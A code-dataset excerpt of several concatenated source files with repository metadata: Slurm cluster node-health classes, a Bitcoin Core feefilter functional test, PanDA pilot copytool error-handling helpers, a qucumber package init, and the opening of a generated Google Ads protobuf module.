return f"{self.id}"
def __hash__(self):
return hash(self.id)
class PartitionStatus(Enum):
UP = "UP"
DOWN = "DOWN"
INACTIVE = "INACTIVE"
DRAIN = "DRAIN"
def __str__(self):
return str(self.value)
class SlurmPartition:
def __init__(self, name, nodenames, state):
"""Initialize slurm partition with attributes."""
self.name = name
self.nodenames = nodenames
self.state = state
self.slurm_nodes = []
def is_inactive(self):
return self.state == "INACTIVE"
def has_running_job(self):
return any(node.is_running_job() for node in self.slurm_nodes)
def get_online_node_by_type(self, terminate_drain_nodes, terminate_down_nodes):
online_compute_resources = set()
if not self.state == "INACTIVE":
for node in self.slurm_nodes:
if (
node.is_healthy(terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=False)
and node.is_online()
):
logger.debug("Currently online node: %s, node state: %s", node.name, node.state_string)
online_compute_resources.add(node.get_compute_resource_name())
return online_compute_resources
def __eq__(self, other):
"""Compare 2 SlurmPartition objects."""
if isinstance(other, SlurmPartition):
return self.__dict__ == other.__dict__
return False
class SlurmNode(metaclass=ABCMeta):
SLURM_SCONTROL_BUSY_STATES = {"MIXED", "ALLOCATED", "COMPLETING"}
SLURM_SCONTROL_IDLE_STATE = "IDLE"
SLURM_SCONTROL_DOWN_STATE = "DOWN"
SLURM_SCONTROL_DRAIN_STATE = "DRAIN"
SLURM_SCONTROL_POWERING_DOWN_STATES = {"POWERING_DOWN", "POWER_DOWN"}
SLURM_SCONTROL_POWER_STATE = {"IDLE", "CLOUD", "POWERED_DOWN"}
SLURM_SCONTROL_POWER_UP_STATE = "POWERING_UP"
SLURM_SCONTROL_ONLINE_STATES = {"IDLE+CLOUD", "MIXED+CLOUD", "ALLOCATED+CLOUD", "COMPLETING+CLOUD"}
SLURM_SCONTROL_POWER_WITH_JOB_STATE = {"MIXED", "CLOUD", "POWERED_DOWN"}
SLURM_SCONTROL_RESUME_FAILED_STATE = {"DOWN", "CLOUD", "POWERED_DOWN", "NOT_RESPONDING"}
def __init__(self, name, nodeaddr, nodehostname, state, partitions=None, instance=None):
"""Initialize slurm node with attributes."""
self.name = name
self.nodeaddr = nodeaddr
self.nodehostname = nodehostname
self.state_string = state
self.states = set(state.split("+"))
self.partitions = partitions.strip().split(",") if partitions else None
self.instance = instance
self.is_static_nodes_in_replacement = False
self._is_being_replaced = False
self._is_replacement_timeout = False
self.is_failing_health_check = False
def is_nodeaddr_set(self):
"""Check if nodeaddr(private ip) for the node is set."""
return self.nodeaddr != self.name
def has_job(self):
"""Check if slurm node is in a working state."""
return any(working_state in self.states for working_state in self.SLURM_SCONTROL_BUSY_STATES)
def _is_drain(self):
"""Check if slurm node is in any drain(draining, drained) states."""
return self.SLURM_SCONTROL_DRAIN_STATE in self.states
def is_drained(self):
"""
Check if slurm node is in drained state.
drained(sinfo) is equivalent to IDLE+DRAIN(scontrol) or DOWN+DRAIN(scontrol)
"""
return self._is_drain() and (self.SLURM_SCONTROL_IDLE_STATE in self.states or self.is_down())
def is_powering_down(self):
"""Check if slurm node is in powering down state."""
return any(
powering_down_state in self.states for powering_down_state in self.SLURM_SCONTROL_POWERING_DOWN_STATES
)
def is_power(self):
"""Check if slurm node is in power state."""
return self.SLURM_SCONTROL_POWER_STATE == self.states
def is_down(self):
"""Check if slurm node is in a down state."""
return self.SLURM_SCONTROL_DOWN_STATE in self.states and not self.is_powering_down()
def is_up(self):
"""Check if slurm node is in a healthy state."""
return not self._is_drain() and not self.is_down() and not self.is_powering_down()
def is_powering_up(self):
"""Check if slurm node is in powering up state."""
return self.SLURM_SCONTROL_POWER_UP_STATE in self.states
def is_online(self):
"""Check if slurm node is online with backing instance."""
return self.state_string in self.SLURM_SCONTROL_ONLINE_STATES
def is_configuring_job(self):
"""Check if slurm node is configuring with job and haven't begun to run a job."""
return self.is_powering_up() and self.has_job()
def is_power_with_job(self):
"""Dynamic nodes allocated a job but power up process has not started yet."""
return self.states == self.SLURM_SCONTROL_POWER_WITH_JOB_STATE
def is_running_job(self):
"""Check if slurm node is running a job but not in configuring job state."""
return not self.is_powering_up() and self.has_job() and not self.is_power_with_job()
def is_resume_failed(self):
"""Check if node resume timeout expires."""
return self.states == self.SLURM_SCONTROL_RESUME_FAILED_STATE
def is_poweing_up_idle(self):
"""Check if node is in IDLE# state."""
return self.SLURM_SCONTROL_IDLE_STATE in self.states and self.is_powering_up()
@abstractmethod
def is_state_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True):
"""Check if a slurm node's scheduler state is considered healthy."""
pass
@abstractmethod
def is_bootstrap_failure(self):
"""
Check if a slurm node has a bootstrap failure.
Here are the cases of bootstrap error we are checking:
Bootstrap error that causes instance to self terminate.
Bootstrap error that prevents instance from joining cluster but does not cause self termination.
"""
pass
@abstractmethod
def is_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True):
"""Check if a slurm node is considered healthy."""
pass
@abstractmethod
def is_powering_down_with_nodeaddr(self):
"""Check if a slurm node is a powering down node with instance backing."""
pass
def is_backing_instance_valid(self, log_warn_if_unhealthy=True):
"""Check if a slurm node's addr is set, it points to a valid instance in EC2."""
if self.is_nodeaddr_set():
if not self.instance:
if log_warn_if_unhealthy:
logger.warning(
"Node state check: no corresponding instance in EC2 for node %s, node state: %s",
self,
self.state_string,
)
return False
return True
@abstractmethod
def needs_reset_when_inactive(self):
"""Check if the node need to be reset if node is inactive."""
pass
def get_compute_resource_name(self):
"""Get instance name of given node."""
_, _, compute_resource_name = parse_nodename(self.name)
return compute_resource_name
def __eq__(self, other):
"""Compare 2 SlurmNode objects."""
if isinstance(other, SlurmNode):
return self.__dict__ == other.__dict__
return False
def __repr__(self):
attrs = ", ".join(["{key}={value}".format(key=key, value=repr(value)) for key, value in self.__dict__.items()])
return "{class_name}({attrs})".format(class_name=self.__class__.__name__, attrs=attrs)
def __str__(self):
return f"{self.name}({self.nodeaddr})"
def __hash__(self):
return hash(self.name)
class StaticNode(SlurmNode):
def __init__(self, name, nodeaddr, nodehostname, state, partitions=None, instance=None):
"""Initialize slurm node with attributes."""
super().__init__(name, nodeaddr, nodehostname, state, partitions, instance)
def is_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True):
"""Check if a slurm node is considered healthy."""
return (
self._is_static_node_configuration_valid(log_warn_if_unhealthy=log_warn_if_unhealthy)
and self.is_backing_instance_valid(log_warn_if_unhealthy=log_warn_if_unhealthy)
and self.is_state_healthy(
terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=log_warn_if_unhealthy
)
)
def is_state_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True):
"""Check if a slurm node's scheduler state is considered healthy."""
# Check to see if node is in DRAINED, ignoring any node currently being replaced
if self.is_drained() and terminate_drain_nodes:
if self._is_being_replaced:
logger.debug(
"Node state check: node %s in DRAINED but is currently being replaced, ignoring, node state: %s",
self,
self.state_string,
)
return True
else:
if log_warn_if_unhealthy:
logger.warning("Node state check: node %s in DRAINED, node state: %s", self, self.state_string)
return False
# Check to see if node is in DOWN, ignoring any node currently being replaced
elif self.is_down() and terminate_down_nodes:
if self._is_being_replaced:
logger.debug(
"Node state check: node %s in DOWN but is currently being replaced, ignoring. Node state: ",
self,
self.state_string,
)
return True
else:
if log_warn_if_unhealthy:
logger.warning("Node state check: node %s in DOWN, node state: %s", self, self.state_string)
return False
return True
def _is_static_node_configuration_valid(self, log_warn_if_unhealthy=True):
"""Check if static node is configured with a private IP."""
if not self.is_nodeaddr_set():
if log_warn_if_unhealthy:
logger.warning(
"Node state check: static node without nodeaddr set, node %s, node state %s:",
self,
self.state_string,
)
return False
return True
def is_bootstrap_failure(self):
"""Check if a slurm node has boostrap failure."""
if self.is_static_nodes_in_replacement and not self.is_backing_instance_valid(log_warn_if_unhealthy=False):
# Node is currently in replacement and no backing instance
logger.warning(
"Node bootstrap error: Node %s is currently in replacement and no backing instance, node state %s:",
self,
self.state_string,
)
return True
# Replacement timeout expires for node in replacement
elif self._is_replacement_timeout:
logger.warning(
"Node bootstrap error: Replacement timeout expires for node %s in replacement, node state %s:",
self,
self.state_string,
)
return True
elif self.is_failing_health_check and self.is_static_nodes_in_replacement:
logger.warning(
"Node bootstrap error: Node %s failed during bootstrap when performing health check, node state %s:",
self,
self.state_string,
)
return True
return False
def is_powering_down_with_nodeaddr(self):
"""Check if a slurm node is a powering down node with instance backing. Static node will not powering down."""
return False
def needs_reset_when_inactive(self):
"""Check if the node need to be reset if node is inactive."""
return self.is_nodeaddr_set()
class DynamicNode(SlurmNode):
def __init__(self, name, nodeaddr, nodehostname, state, partitions=None, instance=None):
"""Initialize slurm node with attributes."""
super().__init__(name, nodeaddr, nodehostname, state, partitions, instance)
def is_state_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True):
"""Check if a slurm node's scheduler state is considered healthy."""
# Check to see if node is in DRAINED, ignoring any node currently being replaced
if self.is_drained() and terminate_drain_nodes:
if log_warn_if_unhealthy:
logger.warning("Node state check: node %s in DRAINED, node state: %s", self, self.state_string)
return False
# Check to see if node is in DOWN, ignoring any node currently being replaced
elif self.is_down() and terminate_down_nodes:
if not self.is_nodeaddr_set():
# Silently handle failed to launch dynamic node to clean up normal logging
logger.debug("Node state check: node %s in DOWN, node state: %s", self, self.state_string)
else:
if log_warn_if_unhealthy:
logger.warning("Node state check: node %s in DOWN, node state: %s", self, self.state_string)
return False
return True
def is_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True):
"""Check if a slurm node is considered healthy."""
return self.is_backing_instance_valid(log_warn_if_unhealthy=log_warn_if_unhealthy) and self.is_state_healthy(
terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=log_warn_if_unhealthy
)
def is_bootstrap_failure(self):
"""Check if a slurm node has boostrap failure."""
# no backing instance + [working state]# in node state
if (self.is_configuring_job() or self.is_poweing_up_idle()) and not self.is_backing_instance_valid(
log_warn_if_unhealthy=False
):
logger.warning(
"Node bootstrap error: Node %s is in power up state without valid backing instance, node state: %s",
self,
self.state_string,
)
return True
# Dynamic node in DOWN+CLOUD+POWERED_DOWN+NOT_RESPONDING state
elif self.is_resume_failed() and self.is_nodeaddr_set():
# We need to check if nodeaddr is set to avoid counting powering up nodes as bootstrap failure nodes during
# cluster start/stop.
logger.warning(
"Node bootstrap error: Resume timeout expires for node %s, node state: %s", self, self.state_string
)
return True
elif self.is_failing_health_check and self.is_powering_up():
logger.warning(
"Node bootstrap error: Node %s failed during bootstrap when performing health check, node state: %s",
self,
self.state_string,
)
return True
return False
def is_powering_down_with_nodeaddr(self):
"""Check if a slurm node is a powering down node with instance backing."""
return self.is_nodeaddr_set() and (self.is_power() or self.is_powering_down())
def needs_reset_when_inactive(self):
"""Check if the node need to be reset if node is inactive."""
return self.is_nodeaddr_set() or (not (self.is_power() or self.is_powering_down() or self.is_down()))
class EC2InstanceHealthState:
def __init__(self, id, state, instance_status, system_status, scheduled_events):
"""Initialize slurm node with attributes."""
self.id = id
self.state = state
self.instance_status = instance_status
self.system_status = system_status
self.scheduled_events = scheduled_events
def fail_ec2_health_check(self, current_time, health_check_timeout):
"""Check if instance is failing any EC2 health check for more than health_check_timeout."""
try:
if (
# Check instance status
self.instance_status.get("Status") in EC2_HEALTH_STATUS_UNHEALTHY_STATES
and time_is_up(
self.instance_status.get("Details")[0].get("ImpairedSince"),
current_time,
health_check_timeout,
)
) or (
# Check system status
self.system_status.get("Status") in EC2_HEALTH_STATUS_UNHEALTHY_STATES
and time_is_up(
self.system_status.get("Details")[0].get("ImpairedSince"),
current_time,
health_check_timeout,
)
):
return True
except Exception as e:
logger.warning("Error when parsing instance health status %s, with exception: %s", self, e)
return False
return False
def fail_scheduled_events_check(self):
"""Check if instance has EC2 scheduled maintenance event."""
if self.scheduled_events:
return True
return False
class InvalidNodenameError(ValueError):
r"""
Exception raised when encountering a NodeName that is invalid/incorrectly formatted.
Valid NodeName format: {queue-name}-{st/dy}-{compute-resource}-{number}
And match: ^([a-z0-9\-]+)-(st|dy)-([a-z0-9\-]+)-\d+$
Sample NodeName: queue-1-st-computeresource-2
"""
pass
def parse_nodename(nodename):
"""Parse queue_name, node_type (st vs dy) and instance_type from nodename."""
nodename_capture = re.match(r"^([a-z0-9\-]+)-(st|dy)-([a-z0-9\-]+)-\d+$", nodename)
if not nodename_capture:
raise InvalidNodenameError
queue_name, node_type, compute_resource_name = nodename_capture.groups()
return queue_name, node_type, compute_resource_name
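# Illustrative example (added comment, not in the original module), using the
# sample NodeName quoted in the InvalidNodenameError docstring above:
#     parse_nodename("queue-1-st-computeresource-2")
#     returns ("queue-1", "st", "computeresource")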
| 41.492843
| 119
| 0.648448
|
8a2c43a2ce7edc4425faae33fb8cc260020487d6
| 3,942
|
py
|
Python
|
test/functional/p2p_feefilter.py
|
patrickdugan/BlockPo-to-Tradelayer
|
ba1ebf3c329751d414302577a09481ba28db1815
|
[
"MIT"
] | null | null | null |
test/functional/p2p_feefilter.py
|
patrickdugan/BlockPo-to-Tradelayer
|
ba1ebf3c329751d414302577a09481ba28db1815
|
[
"MIT"
] | 5
|
2021-06-21T21:21:53.000Z
|
2021-06-22T20:10:16.000Z
|
test/functional/p2p_feefilter.py
|
patrickdugan/BlockPo-to-Tradelayer
|
ba1ebf3c329751d414302577a09481ba28db1815
|
[
"MIT"
] | 1
|
2021-06-21T21:14:45.000Z
|
2021-06-21T21:14:45.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test processing of feefilter messages."""
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
def hashToHex(hash):
return format(hash, '064x')
# Wait up to 60 secs to see if the testnode has received all the expected invs
def allInvsMatch(invsExpected, testnode):
for x in range(60):
with mininode_lock:
if (sorted(invsExpected) == sorted(testnode.txinvs)):
return True
time.sleep(1)
return False
class TestNode(P2PInterface):
def __init__(self):
super().__init__()
self.txinvs = []
def on_inv(self, message):
for i in message.inv:
if (i.type == 1):
self.txinvs.append(hashToHex(i.hash))
def clear_invs(self):
with mininode_lock:
self.txinvs = []
class FeeFilterTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
# We lower the various required feerates for this test
# to catch a corner-case where feefilter used to slightly undercut
# mempool and wallet feerate calculation based on GetFee
# rounding down 3 places, leading to stranded transactions.
# See issue #16499
self.extra_args = [["-minrelaytxfee=0.00000100", "-mintxfee=0.00000100"]]*self.num_nodes
def run_test(self):
node1 = self.nodes[1]
node0 = self.nodes[0]
# Get out of IBD
node1.generate(1)
sync_blocks(self.nodes)
# Setup the p2p connections and start up the network thread.
self.nodes[0].add_p2p_connection(TestNode())
network_thread_start()
self.nodes[0].p2p.wait_for_verack()
# Test that invs are received for all txs at feerate of 20 sat/byte
node1.settxfee(Decimal("0.00020000"))
txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
# Set a filter of 15 sat/byte
self.nodes[0].p2p.send_and_ping(msg_feefilter(15000))
# Test that txs are still being received (paying 20 sat/byte)
txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
# Change tx fee rate to 10 sat/byte and test they are no longer received
node1.settxfee(Decimal("0.00010000"))
[node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
sync_mempools(self.nodes) # must be sure node 0 has received all txs
# Send one transaction from node0 that should be received, so that
# we can sync the test on receipt (if node1's txs were relayed, they'd
# be received by the time this node0 tx is received). This is
# unfortunately reliant on the current relay behavior where we batch up
# to 35 entries in an inv, which means that when this next transaction
# is eligible for relay, the prior transactions from node1 are eligible
# as well.
node0.settxfee(Decimal("0.00020000"))
txids = [node0.sendtoaddress(node0.getnewaddress(), 1)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
# Remove fee filter and check that txs are received again
self.nodes[0].p2p.send_and_ping(msg_feefilter(0))
txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
if __name__ == '__main__':
FeeFilterTest().main()
| 39.029703
| 96
| 0.662608
|
81f6e2ac54f1810cfd522811e9935cacd8b8c39b
| 8,184
|
py
|
Python
|
pilot/copytool/common.py
|
ptrlv/pilot2
|
c5a83e0eccf7de7bee81705064508198cf09cb49
|
[
"Apache-2.0"
] | null | null | null |
pilot/copytool/common.py
|
ptrlv/pilot2
|
c5a83e0eccf7de7bee81705064508198cf09cb49
|
[
"Apache-2.0"
] | null | null | null |
pilot/copytool/common.py
|
ptrlv/pilot2
|
c5a83e0eccf7de7bee81705064508198cf09cb49
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Tobias Wegner, tobias.wegner@cern.ch, 2017
# - Paul Nilsson, paul.nilsson@cern.ch, 2017
import logging
import os
import re
from pilot.common.errorcodes import ErrorCodes
from pilot.util.filehandling import calculate_checksum, get_checksum_type, get_checksum_value
logger = logging.getLogger(__name__)
def get_timeout(filesize):
"""
Get a proper time-out limit based on the file size.
:param filesize: file size (int).
:return: time-out limit in seconds (int).
"""
timeout_max = 3 * 3600 # 3 hours
timeout_min = 300 # self.timeout
timeout = timeout_min + int(filesize / 0.5e6) # approx < 0.5 Mb/sec
return min(timeout, timeout_max)
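# Worked example (added comment, not in the original module): for a 1 GB file,
#     get_timeout(1000000000) = min(300 + int(1e9 / 0.5e6), 3 * 3600)
#                             = min(300 + 2000, 10800)
#                             = 2300 seconds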
def verify_catalog_checksum(fspec, path):
"""
Verify that the local and remote (fspec) checksum values are the same.
The function will update the fspec object.
:param fspec: FileSpec object for a given file.
:param path: path to local file (string).
:return: state (string), diagnostics (string).
"""
diagnostics = ""
state = ""
checksum_type = get_checksum_type(fspec.checksum)
checksum_catalog = get_checksum_value(fspec.checksum)
if checksum_type == 'unknown':
diagnostics = 'unknown checksum type for checksum(catalog): %s' % fspec.checksum
logger.warning(diagnostics)
fspec.status_code = ErrorCodes.UNKNOWNCHECKSUMTYPE
fspec.status = 'failed'
state = 'UNKNOWN_CHECKSUM_TYPE'
else:
checksum_local = calculate_checksum(path, algorithm=checksum_type)
logger.info('checksum (catalog): %s (type: %s)' % (checksum_catalog, checksum_type))
logger.info('checksum (local): %s' % checksum_local)
if checksum_local and checksum_local != '' and checksum_local != checksum_catalog:
diagnostics = 'checksum verification failed: checksum (catalog)=%s != checksum (local)=%s' % \
(checksum_catalog, checksum_local)
logger.warning(diagnostics)
fspec.status_code = ErrorCodes.GETADMISMATCH if checksum_type == 'ad32' else ErrorCodes.GETMD5MISMATCH
fspec.status = 'failed'
state = 'AD_MISMATCH' if checksum_type == 'ad32' else 'MD_MISMATCH'
else:
logger.info('catalog and local checksum values are the same')
return state, diagnostics
def merge_destinations(files):
"""
Convert a list of file-with-destination dicts to a destination-with-files dict.
:param files: Files to merge.
:returns: destination-with-files dictionary.
"""
destinations = {}
# ensure type(files) == list
for f in files:
# ensure destination in f
if not os.path.exists(f['destination']):
f['status'] = 'failed'
f['errmsg'] = 'Destination directory does not exist: %s' % f['destination']
f['errno'] = 1
else:
# ensure scope, name in f
f['status'] = 'running'
f['errmsg'] = 'File not yet successfully downloaded.'
f['errno'] = 2
lfn = '%s:%s' % (f['scope'], f['name'])
dst = destinations.setdefault(f['destination'], {'lfns': set(), 'files': list()})
dst['lfns'].add(lfn)
dst['files'].append(f)
return destinations
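# Shape sketch (added comment; the field values below are hypothetical): given
#     files = [{'destination': '/data', 'scope': 'mc16', 'name': 'EVNT.root'}]
# and assuming '/data' exists, merge_destinations(files) returns
#     {'/data': {'lfns': {'mc16:EVNT.root'}, 'files': [<the file dict, updated in place>]}}
# with each file dict marked status 'running' until the download completes.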
def get_copysetup(copytools, copytool_name):
"""
Return the copysetup for the given copytool.
:param copytools: copytools list from infosys.
:param copytool_name: name of copytool (string).
:return: copysetup (string).
"""
copysetup = ""
for ct in copytools.keys():
if copytool_name == ct:
copysetup = copytools[ct].get('setup')
break
return copysetup
def get_error_info(rcode, state, error_msg):
"""
Return an error info dictionary specific to transfer errors.
Helper function to resolve_common_transfer_errors().
:param rcode: return code (int).
:param state: state string used in Rucio traces.
:param error_msg: transfer command stdout (string).
:return: dictionary with format {'rcode': rcode, 'state': state, 'error': error_msg}.
"""
return {'rcode': rcode, 'state': state, 'error': error_msg}
def output_line_scan(ret, output):
"""
Do some reg exp on the transfer command output to search for special errors.
Helper function to resolve_common_transfer_errors().
:param ret: pre-filled error info dictionary with format {'rcode': rcode, 'state': state, 'error': error_msg}
:param output: transfer command stdout (string).
:return: updated error info dictionary.
"""
for line in output.split('\n'):
m = re.search("Details\s*:\s*(?P<error>.*)", line)
if m:
ret['error'] = m.group('error')
elif 'service_unavailable' in line:
ret['error'] = 'service_unavailable'
ret['rcode'] = ErrorCodes.RUCIOSERVICEUNAVAILABLE
return ret
def resolve_common_transfer_errors(output, is_stagein=True):
"""
Resolve any common transfer related errors.
:param output: stdout from transfer command (string).
:param is_stagein: optional (boolean).
:return: dict {'rcode': rcode, 'state': state, 'error': error_msg}.
"""
# default to make sure dictionary exists and all fields are populated (some of which might be overwritten below)
ret = get_error_info(ErrorCodes.STAGEINFAILED if is_stagein else ErrorCodes.STAGEOUTFAILED,
'COPY_ERROR', 'Copy operation failed [is_stagein=%s]: %s' % (is_stagein, output))
if "timeout" in output:
ret = get_error_info(ErrorCodes.STAGEINTIMEOUT if is_stagein else ErrorCodes.STAGEOUTTIMEOUT,
'CP_TIMEOUT', 'copy command timed out: %s' % output)
elif "does not match the checksum" in output and 'adler32' in output:
ret = get_error_info(ErrorCodes.GETADMISMATCH if is_stagein else ErrorCodes.PUTADMISMATCH,
'AD_MISMATCH', output)
elif "does not match the checksum" in output and 'adler32' not in output:
ret = get_error_info(ErrorCodes.GETMD5MISMATCH if is_stagein else ErrorCodes.PUTMD5MISMATCH,
'MD5_MISMATCH', output)
elif "globus_xio:" in output:
ret = get_error_info(ErrorCodes.GETGLOBUSSYSERR if is_stagein else ErrorCodes.PUTGLOBUSSYSERR,
'GLOBUS_FAIL', "Globus system error: %s" % output)
elif "File exists" in output or 'SRM_FILE_BUSY' in output or 'file already exists' in output:
ret = get_error_info(ErrorCodes.FILEEXISTS, 'FILE_EXISTS',
"File already exists in the destination: %s" % output)
elif "No such file or directory" in output and is_stagein:
ret = get_error_info(ErrorCodes.MISSINGINPUTFILE, 'MISSING_INPUT', output)
elif "query chksum is not supported" in output or "Unable to checksum" in output:
ret = get_error_info(ErrorCodes.CHKSUMNOTSUP, 'CHKSUM_NOTSUP', output)
elif "Could not establish context" in output:
error_msg = "Could not establish context: Proxy / VO extension of proxy has probably expired: %s" % output
ret = get_error_info(ErrorCodes.NOPROXY, 'CONTEXT_FAIL', error_msg)
elif "No space left on device" in output:
ret = get_error_info(ErrorCodes.NOLOCALSPACE if is_stagein else ErrorCodes.NOREMOTESPACE,
'NO_SPACE', "No available space left on disk: %s" % output)
elif "No such file or directory" in output:
ret = get_error_info(ErrorCodes.NOSUCHFILE, 'NO_FILE', output)
elif "service is not available at the moment" in output:
ret = get_error_info(ErrorCodes.SERVICENOTAVAILABLE, 'SERVICE_ERROR', output)
elif "Network is unreachable" in output:
ret = get_error_info(ErrorCodes.UNREACHABLENETWORK, 'NETWORK_UNREACHABLE', output)
else:
# reg exp the output
ret = output_line_scan(ret, output)
return ret
| 39.921951
| 116
| 0.659213
|
d3cc0245efb050062a005341fc62d2b5dedd9e9a
| 1,425
|
py
|
Python
|
qucumber/__init__.py
|
silky/QuCumber
|
f0dd8725b8dd3a0c94f10f1a3b88a769c63a567f
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2019-06-27T11:26:29.000Z
|
2019-06-27T11:26:29.000Z
|
qucumber/__init__.py
|
silky/QuCumber
|
f0dd8725b8dd3a0c94f10f1a3b88a769c63a567f
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
qucumber/__init__.py
|
silky/QuCumber
|
f0dd8725b8dd3a0c94f10f1a3b88a769c63a567f
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2018 PIQuIL - All Rights Reserved
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import warnings
import torch
from .__version__ import __version__
def _warn_on_missing_gpu(gpu):
if gpu and not torch.cuda.is_available():
warnings.warn("Could not find GPU: will continue with CPU.", ResourceWarning)
def set_random_seed(seed, cpu=True, gpu=False, quiet=False):
if gpu and torch.cuda.is_available():
if not quiet:
warnings.warn(
"GPU random seeds are not completely deterministic. "
"Proceed with caution."
)
torch.cuda.manual_seed(seed)
if cpu:
torch.manual_seed(seed)
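# Example usage (added comment, illustrative only):
#     import qucumber
#     qucumber.set_random_seed(1234, cpu=True, gpu=torch.cuda.is_available())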
| 32.386364
| 85
| 0.720702
|
c99b7e55483bf1fc11e83311bd16ff2e8b99d417
| 5,545
|
py
|
Python
|
google/ads/google_ads/v6/proto/services/gender_view_service_pb2.py
|
arammaliachi/google-ads-python
|
a4fe89567bd43eb784410523a6306b5d1dd9ee67
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v6/proto/services/gender_view_service_pb2.py
|
arammaliachi/google-ads-python
|
a4fe89567bd43eb784410523a6306b5d1dd9ee67
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v6/proto/services/gender_view_service_pb2.py
|
arammaliachi/google-ads-python
|
a4fe89567bd43eb784410523a6306b5d1dd9ee67
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v6/services/gender_view_service.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v6.proto.resources import gender_view_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_gender__view__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.api import client_pb2 as google_dot_api_dot_client__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads/v6/services/gender_view_service.proto',
package='google.ads.googleads.v6.services',
syntax='proto3',
serialized_options=b'\n$com.google.ads.googleads.v6.servicesB\026GenderViewServiceProtoP\001ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v6/services;services\242\002\003GAA\252\002 Google.Ads.GoogleAds.V6.Services\312\002 Google\\Ads\\GoogleAds\\V6\\Services\352\002$Google::Ads::GoogleAds::V6::Services',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n:google/ads/googleads/v6/services/gender_view_service.proto\x12 google.ads.googleads.v6.services\x1a\x33google/ads/googleads/v6/resources/gender_view.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\"Z\n\x14GetGenderViewRequest\x12\x42\n\rresource_name\x18\x01 \x01(\tB+\xe0\x41\x02\xfa\x41%\n#googleads.googleapis.com/GenderView2\x9a\x02\n\x11GenderViewService\x12\xbd\x01\n\rGetGenderView\x12\x36.google.ads.googleads.v6.services.GetGenderViewRequest\x1a-.google.ads.googleads.v6.resources.GenderView\"E\x82\xd3\xe4\x93\x02/\x12-/v6/{resource_name=customers/*/genderViews/*}\xda\x41\rresource_name\x1a\x45\xca\x41\x18googleads.googleapis.com\xd2\x41\'https://www.googleapis.com/auth/adwordsB\xfd\x01\n$com.google.ads.googleads.v6.servicesB\x16GenderViewServiceProtoP\x01ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v6/services;services\xa2\x02\x03GAA\xaa\x02 Google.Ads.GoogleAds.V6.Services\xca\x02 Google\\Ads\\GoogleAds\\V6\\Services\xea\x02$Google::Ads::GoogleAds::V6::Servicesb\x06proto3'
,
dependencies=[google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_gender__view__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,google_dot_api_dot_client__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,])
_GETGENDERVIEWREQUEST = _descriptor.Descriptor(
name='GetGenderViewRequest',
full_name='google.ads.googleads.v6.services.GetGenderViewRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v6.services.GetGenderViewRequest.resource_name', index=0,
